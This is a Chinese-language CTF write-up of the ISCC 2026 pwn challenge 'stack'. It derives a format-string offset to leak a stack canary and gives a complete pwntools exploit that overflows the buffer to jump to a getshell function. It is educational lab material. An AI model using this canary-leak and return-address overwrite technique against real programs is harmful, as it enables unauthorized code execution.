ISCC 2026 pwn stack - AlF-ovo's Blog

447 字

2 分钟

ISCC 2026 pwn stack

2026-05-06

ISCC_2026 / pwn / stack

ISCC_2026

Pwn

Format String

Stack Overflow

附件：attachment

题目概览：

漏洞点很直接：

栈溢出，但是开了 canary，需要先泄露
printf(buf) 存在格式化字符串漏洞，可以拿来找偏移并泄露 canary

漏洞位置：

先用格式化字符串测偏移：

偏移测试 1

偏移测试 2

可以看到 0x41414141，也就是 AAAA，对应偏移是 6。这说明 printf 从第 6 个参数开始，已经读到了我们的 buf。

这里其实有三种做法：

运行程序直接打 %p，看 AAAA 出现在第几个参数
手算调用点的栈偏移
动态调试看 call printf 前后的实际栈布局

三种做法本质上是在互相验证。动态调试好理解，这里就不展开演示了，下面只保留运行结果和手算过程。

接着结合调用点计算 canary 所在参数位置。调用点如下：

调用点

计算过程：

1
0xC (sub) + 0x4 (push) + 0x4 (call 返回地址) = 0x14
2
0x14 + 0x70 = 0x84
3
0x84 - 0x0c = 0x78
4
0x78 / 4 = 30

也就是说，第一个额外参数对应的是 [ebp-0x84]，而 buf 在 [ebp-0x70]，所以 buf 正好是第 6 个参数。
canary 在 [ebp-0xc]，它和 buf 之间的距离是：

1
0x70 - 0x0c = 0x64
2
0x64 / 4 = 25
3
6 + 25 = 31

因此 canary 对应第 31 个参数，也就是：

1
%31$p

利用思路分两步：

第一轮发送 b'AA%31$pBB\x00'，泄露 canary
第二轮构造溢出，带上正确 canary，覆盖返回地址到 getshell

拿到 shell 后得到 flag：

Exp：

1
from pwn import *
2

3
context.arch = "i386"
4
context.os = "linux"
5

6
elf = ELF("./attachment")
7

8
def start():
9
    if args.REMOTE:
10
        return remote("HOST", PORT)
11
    return process("./attachment")
12

13
io = start()
14
getshell = 0x080491C6
15

16
io.recvuntil(b"Hello Hacker!\n")
17

18
io.send(b"AA%31$pBB\x00")
19
io.recvuntil(b"AA")
20
canary = int(io.recvuntil(b"BB", drop=True), 16)
21
log.success(f"canary = {hex(canary)}")
22

23
payload  = b"A" * 0x64
24
payload += p32(canary)
25
payload += b"B" * 8
26
payload += b"CCCC"
27
payload += p32(getshell)
28

29
io.send(payload)
30
io.interactive()